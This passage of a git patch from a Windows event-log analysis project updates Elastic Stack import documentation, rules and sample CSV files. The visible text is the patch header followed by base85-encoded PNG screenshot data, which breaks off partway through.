From aa74af4177eb69f9243cf4d0ac17479e7509cd3f Mon Sep 17 00:00:00 2001 From: Tanaka Zakku <71482215+YamatoSecurity@users.noreply.github.com> Date: Fri, 15 Apr 2022 11:14:42 +0900 Subject: [PATCH] update --- .../08-ImportDataSettings.png | Bin 327169 -> 328554 bytes doc/ElasticStackImport/09-ImportFinish.png | Bin 247709 -> 180280 bytes doc/ElasticStackImport/12-AddingColumns.png | Bin 0 -> 125224 bytes .../13-RecommendedColumns.png | Bin 0 -> 98959 bytes .../14-DicoverWithColumns.png | Bin 0 -> 516484 bytes .../ElasticStackImport-English.md | 51 +- rules | 2 +- sample-evtx-default-rules.csv | 14662 ++++++++++++++ sample-evtx.csv | 16623 ++++++++++++++++ 9 files changed, 31324 insertions(+), 14 deletions(-) create mode 100644 doc/ElasticStackImport/12-AddingColumns.png create mode 100644 doc/ElasticStackImport/13-RecommendedColumns.png create mode 100644 doc/ElasticStackImport/14-DicoverWithColumns.png create mode 100644 sample-evtx-default-rules.csv create mode 100644 sample-evtx.csv 
diff --git a/doc/ElasticStackImport/08-ImportDataSettings.png b/doc/ElasticStackImport/08-ImportDataSettings.png index 74f3ab2c3bf9c7e64676e4ae7e1aa4a35f15c103..05954d94ba9a0da3b0668390fe7ce3fcd912e32a 100644 GIT binary patch literal 328554 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 